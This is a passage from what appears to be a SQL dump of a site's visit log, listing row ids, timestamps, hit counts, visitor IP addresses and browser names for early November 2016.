6,1478368631,1,0,1,0,'66.249.75.183',''),(73077,1478368770,1,1,0,0,'163.172.66.160','other'),(73078,1478368787,1,1,0,0,'130.193.50.34','other'),(73079,1478369491,1,1,0,0,'163.172.66.97','other'),(73080,1478369737,1,1,0,0,'163.172.66.59','other'),(73081,1478369740,1,1,0,0,'163.172.66.74','other'),(73082,1478370108,1,1,0,0,'94.179.209.79','firefox'),(73083,1478370330,1,1,0,0,'66.102.9.29','other'),(73084,1478370412,1,1,0,0,'141.0.12.81','other'),(73085,1478370666,1,1,0,0,'176.195.122.189','chrome'),(73086,1478370782,1,1,0,0,'163.172.64.178','other'),(73087,1478372568,1,1,0,0,'66.249.75.183','chrome'),(73088,1478372601,1,1,0,0,'176.195.139.178','chrome'),(73089,1478372740,1,1,0,0,'163.172.64.193','other'),(73090,1478373096,1,1,0,0,'163.172.65.198','other'),(73091,1478373302,1,1,0,0,'157.55.39.41','other'),(73092,1478373475,1,1,0,0,'163.172.65.58','other'),(73093,1478373650,1,1,0,0,'163.172.64.227','other'),(73094,1478373684,1,0,1,0,'66.249.75.179',''),(73095,1478374070,2,2,0,0,'195.154.243.59','chrome'),(73096,1478374119,1,1,0,0,'141.8.183.25','other'),(73097,1478374223,1,1,0,0,'66.102.9.25','other'),(73098,1478374614,1,1,0,0,'82.145.220.187','other'),(73099,1478375162,1,1,0,0,'157.55.39.41','other'),(73100,1478375472,1,1,0,0,'141.8.183.25','other'),(73101,1478377846,1,1,0,0,'141.8.183.25','other'),(73102,1478378109,1,1,0,0,'66.102.9.25','other'),(73103,1478379100,1,1,0,0,'163.172.66.171','other'),(73104,1478379154,1,1,0,0,'64.246.161.42','firefox'),(73105,1478379544,1,1,0,0,'130.193.51.19','other'),(73106,1478379633,1,1,0,0,'163.172.64.216','other'),(73107,1478379672,2,2,0,0,'141.8.183.25','other'),(73108,1478379984,1,1,0,0,'130.193.50.34','other'),(73109,1478381350,1,1,0,0,'40.77.167.50','other'),(73110,1478382206,1,1,0,0,'176.14.238.113','msie'),(73111,1478382398,1,1,0,0,'163.172.65.243','other'),(73112,1478382719,1,1,0,0,'66.102.9.27','other'),(73113,1478383224,1,1,0,0,'130.193.50.34','other'),(73114,1478384137,1,1,0,0,'163.172.64.233','other'),(73115,1478384326,1,1,0,0,'163.172.66.116','other'),(73116,1478384410,1,1,0,0,'163.172.65.16','other'),(73117,1478384676,2,2,0,0,'130.193.50.34','other'),(73118,1478384697,1,1,0,0,'163.172.66.105','other'),(73119,1478385907,1,1,0,0,'157.55.39.41','other'),(73120,1478386480,1,1,0,0,'130.193.50.34','other'),(73121,1478388054,1,1,0,0,'66.102.9.29','other'),(73122,1478389036,1,1,0,0,'207.46.13.85','other'),(73123,1478391318,1,1,0,0,'40.77.167.65','other'),(73124,1478392308,1,1,0,0,'40.77.167.65','other'),(73125,1478392367,1,0,1,0,'66.249.75.183',''),(73126,1478392755,1,1,0,0,'157.55.39.41','other'),(73127,1478394182,1,1,0,0,'66.102.9.25','other'),(73128,1478394508,1,0,1,0,'66.249.69.149',''),(73129,1478395048,1,1,0,0,'163.172.65.52','other'),(73130,1478395132,1,1,0,0,'163.172.65.111','other'),(73131,1478395194,1,1,0,0,'163.172.65.21','other'),(73132,1478395302,1,1,0,0,'163.172.65.50','other'),(73133,1478395692,1,1,0,0,'163.172.65.252','other'),(73134,1478395931,1,0,1,0,'66.249.75.179',''),(73135,1478396173,1,0,1,0,'66.249.75.187',''),(73136,1478396526,1,1,0,0,'128.72.114.115','msie'),(73137,1478397271,1,1,0,0,'40.77.167.65','other'),(73138,1478397811,1,1,0,0,'163.172.64.229','other'),(73139,1478397839,1,1,0,0,'163.172.64.232','other'),(73140,1478398309,1,1,0,0,'163.172.65.131','other'),(73141,1478398341,1,1,0,0,'163.172.65.21','other'),(73142,1478398665,1,1,0,0,'163.172.65.6','other'),(73143,1478398897,1,1,0,0,'163.172.64.254','other'),(73144,1478398936,1,1,0,0,'180.76.15.152','other'),(73145,1478399052,1,1,0,0,'66.102.9.29','other'),(73146,1478399280,1,1,0,0,'163.172.65.239','other'),(73147,1478399437,1,1,0,0,'130.193.50.34','other'),(73148,1478399533,1,0,1,0,'66.249.69.149',''),(73149,1478399889,1,1,0,0,'163.172.65.109','other'),(73150,1478401230,1,1,0,0,'163.172.66.31','other'),(73151,1478401474,2,2,0,0,'130.193.50.34','other'),(73152,1478402593,2,2,0,0,'130.193.50.34','other'),(73153,1478402720,1,1,0,0,'163.172.65.52','other'),(73154,1478402839,1,1,0,0,'163.172.66.121','other'),(73155,1478403012,1,1,0,0,'66.102.9.25','other'),(73156,1478403288,1,0,1,0,'66.249.75.179',''),(73157,1478403474,1,0,1,0,'66.249.69.152',''),(73158,1478404037,1,1,0,0,'163.172.64.216','other'),(73159,1478404401,1,1,0,0,'163.172.65.37','other'),(73160,1478404408,1,1,0,0,'130.193.50.34','other'),(73161,1478404488,2,0,2,0,'66.249.75.179',''),(73162,1478404908,1,1,0,0,'188.32.185.94','msie'),(73163,1478405449,1,1,0,0,'163.172.65.196','other'),(73164,1478405772,1,1,0,0,'163.172.66.174','other'),(73165,1478405820,1,1,0,0,'163.172.66.75','other'),(73166,1478407458,1,1,0,0,'37.53.157.235','other'),(73167,1478408220,1,1,0,0,'130.193.50.34','other'),(73168,1478408385,1,1,0,0,'163.172.66.182','other'),(73169,1478408709,1,1,0,0,'66.249.75.187','chrome'),(73170,1478408716,1,1,0,0,'66.102.9.27','other'),(73171,1478409079,1,1,0,0,'157.55.39.37','other'),(73172,1478409122,1,1,0,0,'40.77.167.50','other'),(73173,1478409300,1,1,0,0,'130.193.51.19','other'),(73174,1478409348,1,1,0,0,'40.77.167.65','other'),(73175,1478409436,1,1,0,0,'141.0.12.174','other'),(73176,1478409821,1,0,1,0,'66.249.75.187',''),(73177,1478410083,1,0,1,0,'66.249.69.155',''),(73178,1478410433,1,1,0,0,'40.77.167.50','other'),(73179,1478410871,1,1,0,0,'66.102.9.29','other'),(73180,1478411233,1,1,0,0,'163.172.65.2','other'),(73181,1478411252,1,0,1,0,'66.249.75.179',''),(73182,1478411562,1,1,0,0,'163.172.65.244','other'),(73183,1478411924,1,1,0,0,'174.129.237.157','other'),(73184,1478411928,1,1,0,0,'163.172.65.205','other'),(73185,1478412442,1,1,0,0,'157.55.39.37','other'),(73186,1478412452,1,0,1,0,'66.249.69.149',''),(73187,1478412526,1,0,1,0,'66.249.75.187',''),(73188,1478412777,2,2,0,0,'163.172.49.61','other'),(73189,1478413525,1,1,0,0,'66.249.69.152','chrome'),(73190,1478414955,1,0,1,0,'66.249.75.187',''),(73191,1478415073,1,1,0,0,'66.102.9.29','other'),(73192,1478416078,1,1,0,0,'163.172.65.209','other'),(73193,1478416369,2,0,2,0,'66.249.75.179',''),(73194,1478416628,1,0,1,0,'66.249.75.183',''),(73195,1478417068,2,2,0,0,'5.9.111.70','other'),(73196,1478417278,1,1,0,0,'2.92.35.126','firefox'),(73197,1478417825,1,1,0,0,'130.193.50.34','other'),(73198,1478418006,1,1,0,0,'163.172.66.73','other'),(73199,1478418083,1,1,0,0,'163.172.66.78','other'),(73200,1478418101,1,1,0,0,'66.102.9.29','other'),(73201,1478418120,1,1,0,0,'40.77.167.50','other'),(73202,1478418405,1,1,0,0,'66.249.93.141','chrome'),(73203,1478418578,1,1,0,0,'141.8.183.25','other'),(73204,1478419427,1,1,0,0,'157.55.39.41','other'),(73205,1478419964,1,1,0,0,'94.179.209.79','firefox'),(73206,1478420023,1,1,0,0,'163.172.66.173','other'),(73207,1478420205,2,2,0,0,'130.193.51.19','other'),(73208,1478420280,1,1,0,0,'94.179.68.49','firefox'),(73209,1478421035,1,1,0,0,'163.172.65.243','other'),(73210,1478421387,1,0,1,0,'66.249.75.187',''),(73211,1478421739,1,1,0,0,'66.102.9.29','other'),(73212,1478421844,1,1,0,0,'163.172.66.104','other'),(73213,1478422381,1,1,0,0,'141.8.142.58','other'),(73214,1478422474,2,2,0,0,'141.8.142.61','other'),(73215,1478423150,1,1,0,0,'163.172.66.26','other'),(73216,1478423369,1,1,0,0,'130.193.51.19','other'),(73217,1478423474,1,0,1,0,'66.249.75.179',''),(73218,1478424059,1,0,1,0,'66.249.75.187',''),(73219,1478424447,1,1,0,0,'163.172.65.220','other'),(73220,1478424488,1,1,0,0,'157.55.39.37','other'),(73221,1478424861,1,1,0,0,'163.172.65.34','other'),(73222,1478425002,1,0,1,0,'66.249.75.183',''),(73223,1478425051,1,0,1,0,'66.249.75.187',''),(73224,1478425280,1,0,1,0,'66.249.75.179',''),(73225,1478425628,1,1,0,0,'163.172.66.128','other'),(73226,1478425868,1,1,0,0,'66.102.9.27','other'),(73227,1478426122,1,1,0,0,'163.172.64.181','other'),(73228,1478426308,1,1,0,0,'163.172.65.252','other'),(73229,1478427169,1,0,1,0,'66.249.75.179',''),(73230,1478427213,1,1,0,0,'163.172.66.54','other'),(73231,1478427659,1,1,0,0,'163.172.66.95','other'),(73232,1478427685,1,1,0,0,'163.172.66.106','other'),(73233,1478427962,1,1,0,0,'95.134.171.147','chrome'),(73234,1478428185,1,1,0,0,'163.172.66.180','other'),(73235,1478428474,1,1,0,0,'157.55.39.92','other'),(73236,1478428964,1,1,0,0,'66.102.9.25','other'),(73237,1478429460,1,1,0,0,'163.172.66.140','other'),(73238,1478430776,1,0,1,0,'66.249.75.187',''),(73239,1478430811,1,1,0,0,'163.172.65.180','other'),(73240,1478431063,1,1,0,0,'163.172.66.87','other'),(73241,1478431560,1,0,1,0,'66.249.75.179',''),(73242,1478432294,1,1,0,0,'163.172.66.47','other'),(73243,1478432420,1,1,0,0,'66.249.69.152','chrome'),(73244,1478432744,1,1,0,0,'163.172.66.10','other'),(73245,1478433570,1,1,0,0,'180.76.15.13','other'),(73246,1478433978,1,1,0,0,'163.172.65.41','other'),(73247,1478434103,2,0,2,0,'66.249.75.183',''),(73248,1478434198,1,1,0,0,'163.172.66.135','other'),(73249,1478434207,1,1,0,0,'163.172.66.36','other'),(73250,1478434372,1,1,0,0,'163.172.65.182','other'),(73251,1478434920,1,0,1,0,'66.249.75.187',''),(73252,1478435501,2,0,2,0,'66.249.75.183',''),(73253,1478435513,1,1,0,0,'163.172.66.38','other'),(73254,1478435795,1,1,0,0,'163.172.66.59','other'),(73255,1478436151,1,1,0,0,'163.172.66.21','other'),(73256,1478436208,1,1,0,0,'163.172.65.231','other'),(73257,1478436557,1,0,1,0,'66.249.75.179',''),(73258,1478436832,1,0,1,0,'66.249.75.183',''),(73259,1478436852,2,2,0,0,'157.55.39.92','other'),(73260,1478436909,1,1,0,0,'163.172.64.236','other'),(73261,1478436943,1,1,0,0,'66.102.9.25','other'),(73262,1478437037,1,1,0,0,'95.158.63.136','chrome'),(73263,1478437696,1,1,0,0,'91.196.178.104','chrome'),(73264,1478437980,1,1,0,0,'163.172.65.124','other'),(73265,1478438132,1,1,0,0,'163.172.66.175','other'),(73266,1478438333,1,1,0,0,'163.172.66.20','other'),(73267,1478440276,1,1,0,0,'163.172.65.130','other'),(73268,1478441044,1,1,0,0,'66.102.9.25','other'),(73269,1478441730,1,1,0,0,'163.172.65.45','other'),(73270,1478442203,2,2,0,0,'130.193.51.19','other'),(73271,1478442290,1,1,0,0,'157.55.39.19','other'),(73272,1478442309,1,1,0,0,'66.102.9.29','chrome'),(73273,1478442325,1,1,0,0,'94.178.70.62','chrome'),(73274,1478442457,1,1,0,0,'141.8.183.25','other'),(73275,1478443105,1,1,0,0,'163.172.65.19','other'),(73276,1478443949,1,1,0,0,'66.102.9.27','other'),(73277,1478444192,1,1,0,0,'163.172.66.173','other'),(73278,1478445319,1,1,0,0,'163.172.64.254','other'),(73279,1478445762,1,1,0,0,'94.179.209.79','firefox'),(73280,1478445770,1,1,0,0,'91.196.178.65','chrome'),(73281,1478446102,1,1,0,0,'163.172.66.131','other'),(73282,1478446162,1,1,0,0,'163.172.66.175','other'),(73283,1478446307,1,0,1,0,'66.249.75.179',''),(73284,1478446534,1,1,0,0,'163.172.65.227','other'),(73285,1478446759,1,1,0,0,'5.3.152.75','msie'),(73286,1478447159,1,1,0,0,'163.172.66.66','other'),(73287,1478447327,1,1,0,0,'66.102.9.27','other'),(73288,1478447529,1,1,0,0,'163.172.64.222','other'),(73289,1478447849,1,1,0,0,'157.55.39.41','other'),(73290,1478447887,2,0,2,0,'66.249.75.183',''),(73291,1478448185,1,0,1,0,'66.249.75.187',''),(73292,1478448324,1,1,0,0,'163.172.65.55','other'),(73293,1478448539,1,1,0,0,'180.76.15.148','other'),(73294,1478448853,1,1,0,0,'163.172.66.133','other'),(73295,1478448986,1,1,0,0,'130.193.50.34','other'),(73296,1478449746,1,1,0,0,'95.27.190.192','chrome'),(73297,1478449925,1,1,0,0,'163.172.66.159','other'),(73298,1478449990,1,0,1,0,'66.249.75.179',''),(73299,1478450255,1,1,0,0,'141.0.12.132','chrome'),(73300,1478450513,1,1,0,0,'66.102.9.25','other'),(73301,1478450696,1,1,0,0,'91.196.178.98','other'),(73302,1478450722,1,1,0,0,'91.196.178.98','chrome'),(73303,1478450973,1,1,0,0,'66.249.75.187','chrome'),(73304,1478451032,1,1,0,0,'94.179.71.79','chrome'),(73305,1478451838,1,1,0,0,'163.172.65.231','other'),(73306,1478451984,1,0,1,0,'66.249.69.152',''),(73307,1478452044,1,1,0,0,'163.172.65.35','other'),(73308,1478452061,1,1,0,0,'51.254.121.186','other'),(73309,1478452702,1,1,0,0,'157.55.39.41','other'),(73310,1478453183,1,1,0,0,'163.172.66.62','other'),(73311,1478453207,1,1,0,0,'163.172.65.23','other'),(73312,1478453487,1,1,0,0,'163.172.66.124','other'),(73313,1478453743,1,1,0,0,'163.172.66.98','other'),(73314,1478454504,2,0,2,0,'66.249.69.60',''),(73315,1478454826,1,1,0,0,'91.196.178.67','chrome'),(73316,1478456862,1,1,0,0,'66.249.69.56','chrome'),(73317,1478457319,1,1,0,0,'157.55.39.41','other'),(73318,1478457489,1,1,0,0,'66.102.9.25','other'),(73319,1478457994,1,0,1,0,'66.249.69.74',''),(73320,1478458217,1,0,1,0,'66.249.69.79',''),(73321,1478458278,1,1,0,0,'163.172.66.13','other'),(73322,1478458643,1,0,1,0,'66.249.69.52',''),(73323,1478458715,1,1,0,0,'163.172.65.8','other'),(73324,1478458835,1,0,1,0,'66.249.69.60',''),(73325,1478459367,2,2,0,0,'93.78.212.140','chrome'),(73326,1478459699,1,1,0,0,'163.172.64.235','other'),(73327,1478460928,1,1,0,0,'163.172.65.218','other'),(73328,1478461159,1,1,0,0,'40.77.167.7','other'),(73329,1478461306,1,1,0,0,'163.172.64.236','other'),(73330,1478461721,1,0,1,0,'66.249.69.56',''),(73331,1478462078,1,1,0,0,'180.76.15.32','other'),(73332,1478462397,1,1,0,0,'157.55.39.41','other'),(73333,1478463269,1,1,0,0,'163.172.65.186','other'),(73334,1478463314,1,0,1,0,'66.249.69.52',''),(73335,1478464080,1,1,0,0,'66.249.69.52','chrome'),(73336,1478464179,1,1,0,0,'66.102.9.38','chrome'),(73337,1478464841,1,1,0,0,'163.172.66.50','other'),(73338,1478465997,1,1,0,0,'163.172.66.129','other'),(73339,1478466405,1,0,1,0,'66.249.69.60',''),(73340,1478467812,1,1,0,0,'163.172.66.136','other'),(73341,1478468355,1,1,0,0,'207.46.13.154','other'),(73342,1478469290,1,0,1,0,'66.249.69.74',''),(73343,1478469705,1,0,1,0,'66.249.69.69',''),(73344,1478470340,1,0,1,0,'66.249.69.79',''),(73345,1478471843,1,0,1,0,'66.249.69.60',''),(73346,1478475157,1,0,1,0,'66.249.69.56',''),(73347,1478478676,1,1,0,0,'40.77.167.50','other'),(73348,1478480092,2,2,0,0,'157.55.39.92','other'),(73349,1478480913,1,0,1,0,'66.249.69.52',''),(73350,1478483026,1,1,0,0,'51.254.141.216','other'),(73351,1478483509,1,1,0,0,'207.46.13.154','other'),(73352,1478483641,1,1,0,0,'176.193.160.183','other'),(73353,1478484457,1,0,1,0,'66.249.69.69',''),(73354,1478484507,1,1,0,0,'163.172.65.250','other'),(73355,1478484713,1,1,0,0,'163.172.66.57','other'),(73356,1478485067,1,1,0,0,'163.172.66.27','other'),(73357,1478485995,1,0,1,0,'66.249.69.60',''),(73358,1478486739,1,1,0,0,'130.193.50.34','other'),(73359,1478488160,1,1,0,0,'163.172.64.230','other'),(73360,1478489247,1,1,0,0,'163.172.66.52','other'),(73361,1478489714,2,1,1,0,'62.210.162.42',''),(73362,1478490994,1,1,0,0,'66.102.9.27','other'),(73363,1478492197,1,1,0,0,'163.172.65.213','other'),(73364,1478492863,1,1,0,0,'40.77.167.50','other'),(73365,1478493658,1,1,0,0,'163.172.66.106','other'),(73366,1478494067,1,1,0,0,'163.172.66.121','other'),(73367,1478494327,1,1,0,0,'163.172.64.223','other'),(73368,1478495130,1,0,1,0,'66.249.69.56',''),(73369,1478495198,1,1,0,0,'66.102.9.27','chrome'),(73370,1478495600,1,1,0,0,'163.172.66.81','other'),(73371,1478495708,1,1,0,0,'163.172.65.43','other'),(73372,1478495994,1,1,0,0,'66.249.69.56','chrome'),(73373,1478496010,1,1,0,0,'163.172.65.119','other'),(73374,1478496459,1,1,0,0,'66.102.9.27','other'),(73375,1478496984,1,1,0,0,'180.76.15.10','other'),(73376,1478498347,1,1,0,0,'92.101.193.206','chrome'),(73377,1478498456,1,1,0,0,'66.102.9.27','other'),(73378,1478499118,1,0,1,0,'66.249.69.56',''),(73379,1478499174,1,1,0,0,'91.196.178.70','firefox'),(73380,1478499412,1,1,0,0,'91.196.178.70','chrome'),(73381,1478499530,1,1,0,0,'163.172.65.189','other'),(73382,1478500499,1,1,0,0,'91.196.178.33','chrome'),(73383,1478500856,1,0,1,0,'66.249.69.60',''),(73384,1478500874,1,0,1,0,'66.249.69.52',''),(73385,1478500875,1,0,1,0,'66.249.69.69',''),(73386,1478501003,1,1,0,0,'180.76.15.144','other'),(73387,1478501342,1,1,0,0,'163.172.65.200','other'),(73388,1478501715,1,1,0,0,'163.172.66.21','other'),(73389,1478501892,1,1,0,0,'91.196.178.65','chrome'),(73390,1478501895,1,1,0,0,'163.172.65.19','other'),(73391,1478501926,1,1,0,0,'141.8.183.25','other'),(73392,1478503329,1,1,0,0,'91.196.178.70','firefox'),(73393,1478503454,1,1,0,0,'163.172.65.6','other'),(73394,1478503878,1,0,1,0,'66.249.69.60',''),(73395,1478504719,1,1,0,0,'163.172.65.56','other'),(73396,1478504957,1,1,0,0,'163.172.66.96','other'),(73397,1478505926,1,1,0,0,'163.172.65.125','other'),(73398,1478507040,1,1,0,0,'204.79.180.212','msie'),(73399,1478507539,1,1,0,0,'163.172.65.41','other'),(73400,1478507848,1,1,0,0,'91.196.178.70','firefox'),(73401,1478510335,1,1,0,0,'94.179.93.187','firefox'),(73402,1478510726,1,1,0,0,'163.172.65.51','other'),(73403,1478510732,1,1,0,0,'178.92.57.199','firefox'),(73404,1478510881,2,0,2,0,'66.249.69.52',''),(73405,1478510884,1,1,0,0,'141.8.183.25','other'),(73406,1478511104,1,1,0,0,'163.172.66.62','other'),(73407,1478511162,1,0,1,0,'66.249.69.56',''),(73408,1478511719,1,1,0,0,'178.92.57.199','firefox'),(73409,1478511990,1,1,0,0,'66.249.69.74','chrome'),(73410,1478512102,1,1,0,0,'163.172.65.207','other'),(73411,1478512236,1,1,0,0,'163.172.66.117','other'),(73412,1478512523,1,1,0,0,'91.196.178.70','firefox'),(73413,1478513213,1,1,0,0,'95.135.11.87','firefox'),(73414,1478513672,1,1,0,0,'163.172.66.131','other'),(73415,1478514701,2,2,0,0,'91.196.178.65','chrome'),(73416,1478515068,1,1,0,0,'163.172.65.195','other'),(73417,1478515277,1,0,1,0,'66.249.69.60',''),(73418,1478515281,1,1,0,0,'195.49.151.89','chrome'),(73419,1478515414,1,1,0,0,'94.179.48.72','firefox'),(73420,1478515754,1,1,0,0,'163.172.66.129','other'),(73421,1478516069,1,1,0,0,'95.135.11.87','firefox'),(73422,1478516527,1,1,0,0,'91.196.177.46','chrome'),(73423,1478516771,1,1,0,0,'157.55.39.92','other'),(73424,1478517222,1,1,0,0,'163.172.66.38','other'),(73425,1478517280,1,0,1,0,'66.249.69.74',''),(73426,1478517342,1,1,0,0,'163.172.65.36','other'),(73427,1478518339,1,1,0,0,'91.196.178.161','chrome'),(73428,1478518367,1,1,0,0,'163.172.64.178','other'),(73429,1478518416,1,1,0,0,'163.172.65.234','other'),(73430,1478518449,1,1,0,0,'91.124.118.118','chrome'),(73431,1478518916,1,1,0,0,'163.172.65.205','other'),(73432,1478518948,1,1,0,0,'163.172.66.122','other'),(73433,1478519281,1,1,0,0,'91.196.177.46','chrome'),(73434,1478519438,1,1,0,0,'91.196.178.67','firefox'),(73435,1478519531,1,1,0,0,'163.172.66.123','other'),(73436,1478519686,1,1,0,0,'91.196.178.131','firefox'),(73437,1478519755,2,2,0,0,'178.92.57.199','firefox'),(73438,1478520224,1,1,0,0,'163.172.64.230','other'),(73439,1478520387,1,1,0,0,'163.172.66.6','other'),(73440,1478520643,1,1,0,0,'163.172.65.207','other'),(73441,1478520905,1,1,0,0,'163.172.65.209','other'),(73442,1478521365,1,1,0,0,'163.172.64.242','other'),(73443,1478521650,1,1,0,0,'130.180.217.160','chrome'),(73444,1478521717,1,1,0,0,'91.196.178.65','firefox'),(73445,1478521904,3,0,3,0,'66.249.69.52',''),(73446,1478521983,1,1,0,0,'163.172.66.101','other'),(73447,1478522132,1,0,1,0,'66.249.69.56',''),(73448,1478522334,1,1,0,0,'163.172.66.114','other'),(73449,1478522708,1,1,0,0,'204.79.180.66','msie'),(73450,1478522988,1,1,0,0,'207.46.13.154','other'),(73451,1478523821,1,1,0,0,'37.52.45.107','opera'),(73452,1478524355,1,0,1,0,'66.249.69.56',''),(73453,1478526130,1,0,1,0,'66.249.69.74',''),(73454,1478526254,1,1,0,0,'94.179.33.55','chrome'),(73455,1478526308,1,1,0,0,'46.201.252.55','firefox'),(73456,1478526789,1,1,0,0,'163.172.66.55','other'),(73457,1478527106,1,1,0,0,'163.172.66.157','other'),(73458,1478527161,2,2,0,0,'195.248.184.80','chrome'),(73459,1478527211,1,1,0,0,'130.180.219.193','opera'),(73460,1478527750,1,0,1,0,'66.249.69.60',''),(73461,1478528120,1,1,0,0,'195.248.184.80','chrome'),(73462,1478528258,1,1,0,0,'91.196.178.161','chrome'),(73463,1478528597,1,1,0,0,'91.196.178.67','firefox'),(73464,1478528789,2,2,0,0,'91.196.178.65','chrome'),(73465,1478529609,1,1,0,0,'91.196.177.46','firefox'),(73466,1478529768,1,1,0,0,'91.196.178.67','firefox'),(73467,1478530383,1,1,0,0,'141.8.183.25','other'),(73468,1478530394,1,1,0,0,'91.196.178.134','chrome'),(73469,1478530969,1,1,0,0,'180.76.15.153','other'),(73470,1478531043,1,1,0,0,'163.172.66.9','other'),(73471,1478531177,1,1,0,0,'91.196.178.69','chrome'),(73472,1478531251,1,1,0,0,'163.172.65.120','other'),(73473,1478531614,1,0,1,0,'66.249.69.60',''),(73474,1478532741,1,1,0,0,'163.172.66.42','other'),(73475,1478532997,2,1,1,0,'62.210.83.88',''),(73476,1478533040,1,1,0,0,'66.249.93.143','chrome'),(73477,1478533224,1,1,0,0,'163.172.66.166','other'),(73478,1478533561,1,1,0,0,'37.55.225.57','chrome'),(73479,1478533898,1,1,0,0,'91.196.178.167','other'),(73480,1478534133,1,0,1,0,'66.249.69.60',''),(73481,1478534504,2,0,2,0,'66.249.69.56',''),(73482,1478534971,1,1,0,0,'163.172.64.187','other'),(73483,1478535353,1,1,0,0,'157.55.39.92','other'),(73484,1478535483,1,0,1,0,'66.249.69.52',''),(73485,1478535791,1,1,0,0,'163.172.66.103','other'),(73486,1478535885,1,1,0,0,'163.172.66.122','other'),(73487,1478536479,1,1,0,0,'91.124.118.118','chrome'),(73488,1478536627,1,1,0,0,'163.172.66.59','other'),(73489,1478536896,1,1,0,0,'163.172.65.210','other'),(73490,1478536926,1,1,0,0,'94.179.209.79','firefox'),(73491,1478537208,1,1,0,0,'180.76.15.16','other'),(73492,1478537766,1,0,1,0,'66.249.69.60',''),(73493,1478538043,1,1,0,0,'66.249.69.56','chrome'),(73494,1478539653,1,1,0,0,'66.249.69.56','chrome'),(73495,1478540254,1,0,1,0,'66.249.69.74',''),(73496,1478540429,1,1,0,0,'157.55.39.92','other'),(73497,1478540634,1,1,0,0,'91.196.178.99','chrome'),(73498,1478541026,1,1,0,0,'66.102.9.25','chrome'),(73499,1478541219,1,1,0,0,'157.55.39.51','other'),(73500,1478542010,2,2,0,0,'163.172.65.11','other'),(73501,1478542139,1,1,0,0,'163.172.65.225','other'),(73502,1478543518,1,1,0,0,'178.92.8.102','chrome'),(73503,1478543620,1,1,0,0,'163.172.66.142','other'),(73504,1478543708,1,1,0,0,'163.172.66.54','other'),(73505,1478544046,1,1,0,0,'109.229.8.250','firefox'),(73506,1478544344,1,1,0,0,'94.179.120.124','firefox'),(73507,1478544898,2,0,2,0,'66.249.69.52',''),(73508,1478545088,1,1,0,0,'163.172.66.151','other'),(73509,1478545559,1,1,0,0,'163.172.65.185','other'),(73510,1478545784,1,1,0,0,'94.179.18.211','chrome'),(73511,1478545801,1,1,0,0,'163.172.66.9','other'),(73512,1478545807,1,1,0,0,'104.209.188.207','other'),(73513,1478545808,1,1,0,0,'104.45.18.178','other'),(73514,1478546728,1,1,0,0,'163.172.66.170','other'),(73515,1478546988,1,1,0,0,'163.172.66.130','other'),(73516,1478547077,1,1,0,0,'94.179.105.104','chrome'),(73517,1478547578,1,1,0,0,'163.172.66.119','other'),(73518,1478547828,1,1,0,0,'163.172.66.95','other'),(73519,1478549167,1,1,0,0,'163.172.65.247','other'),(73520,1478549495,1,1,0,0,'163.172.66.121','other'),(73521,1478549602,1,1,0,0,'163.172.66.19','other'),(73522,1478550220,1,1,0,0,'163.172.64.249','other'),(73523,1478551660,1,1,0,0,'91.202.129.192','chrome'),(73524,1478551744,1,1,0,0,'157.55.39.41','other'),(73525,1478551833,1,1,0,0,'195.211.23.206','other'),(73526,1478551888,1,1,0,0,'163.172.64.217','other'),(73527,1478552387,1,1,0,0,'91.196.178.72','chrome'),(73528,1478553057,1,1,0,0,'163.172.66.38','other'),(73529,1478553138,1,1,0,0,'157.55.39.51','other'),(73530,1478554556,1,1,0,0,'163.172.64.253','other'),(73531,1478554953,1,1,0,0,'128.70.187.92','other'),(73532,1478555287,1,1,0,0,'178.95.159.126','chrome'),(73533,1478555470,1,1,0,0,'163.172.65.242','other'),(73534,1478555486,1,1,0,0,'163.172.65.240','other'),(73535,1478555626,1,1,0,0,'91.202.129.192','chrome'),(73536,1478556282,1,1,0,0,'157.55.39.51','other'),(73537,1478556427,1,1,0,0,'94.154.225.127','chrome'),(73538,1478556798,1,1,0,0,'163.172.66.140','other'),(73539,1478556991,1,1,0,0,'163.172.65.38','other'),(73540,1478557801,1,1,0,0,'163.172.65.31','other'),(73541,1478558226,1,1,0,0,'163.172.66.8','other'),(73542,1478560433,1,1,0,0,'163.172.66.108','other'),(73543,1478561914,1,1,0,0,'207.46.13.154','other'),(73544,1478562060,1,1,0,0,'163.172.66.23','other'),(73545,1478562110,1,1,0,0,'163.172.65.185','other'),(73546,1478562477,1,1,0,0,'163.172.65.218','other'),(73547,1478563013,1,1,0,0,'141.8.183.25','other'),(73548,1478563014,1,1,0,0,'212.111.203.44','chrome'),(73549,1478563226,1,1,0,0,'157.55.39.92','other'),(73550,1478564790,1,0,1,0,'66.249.69.60',''),(73551,1478564814,1,1,0,0,'163.172.64.249','other'),(73552,1478564841,1,1,0,0,'163.172.66.32','other'),(73553,1478566378,1,1,0,0,'163.172.66.30','other'),(73554,1478566502,2,2,0,0,'163.172.65.13','other'),(73555,1478566609,1,1,0,0,'163.172.66.55','other'),(73556,1478567191,1,1,0,0,'157.55.39.51','other'),(73557,1478567474,1,1,0,0,'163.172.65.219','other'),(73558,1478568205,1,1,0,0,'163.172.66.44','other'),(73559,1478568380,1,1,0,0,'163.172.66.56','other'),(73560,1478568513,1,1,0,0,'157.55.39.51','other'),(73561,1478568752,1,1,0,0,'163.172.65.225','other'),(73562,1478569099,1,1,0,0,'163.172.65.250','other'),(73563,1478570818,1,1,0,0,'163.172.66.66','other'),(73564,1478571005,1,1,0,0,'163.172.65.15','other'),(73565,1478573734,1,1,0,0,'163.172.65.50','other'),(73566,1478574092,1,1,0,0,'163.172.66.166','other'),(73567,1478574104,1,1,0,0,'163.172.64.227','other'),(73568,1478574178,1,0,1,0,'66.249.69.60',''),(73569,1478575320,1,1,0,0,'163.172.66.57','other'),(73570,1478575936,1,1,0,0,'163.172.66.176','other'),(73571,1478575956,1,1,0,0,'157.55.39.41','other'),(73572,1478576112,1,1,0,0,'163.172.65.199','other'),(73573,1478576179,1,1,0,0,'163.172.64.223','other'),(73574,1478576684,2,1,1,0,'66.249.69.56',''),(73575,1478577092,1,1,0,0,'163.172.66.182','other'),(73576,1478577266,1,1,0,0,'66.102.9.27','other'),(73577,1478577431,1,1,0,0,'163.172.66.44','other'),(73578,1478577867,1,1,0,0,'163.172.66.161','other'),(73579,1478578384,1,1,0,0,'66.249.69.60','chrome'),(73580,1478578392,1,1,0,0,'163.172.66.156','other'),(73581,1478579043,1,1,0,0,'163.172.65.119','other'),(73582,1478579210,1,1,0,0,'66.249.69.56','chrome'),(73583,1478579221,1,1,0,0,'66.102.9.25','other'),(73584,1478579329,1,1,0,0,'163.172.66.157','other'),(73585,1478579480,1,1,0,0,'130.193.37.21','other'),(73586,1478579535,1,1,0,0,'163.172.66.32','other'),(73587,1478579607,1,1,0,0,'163.172.66.172','other'),(73588,1478579876,1,1,0,0,'163.172.65.192','other'),(73589,1478580512,1,1,0,0,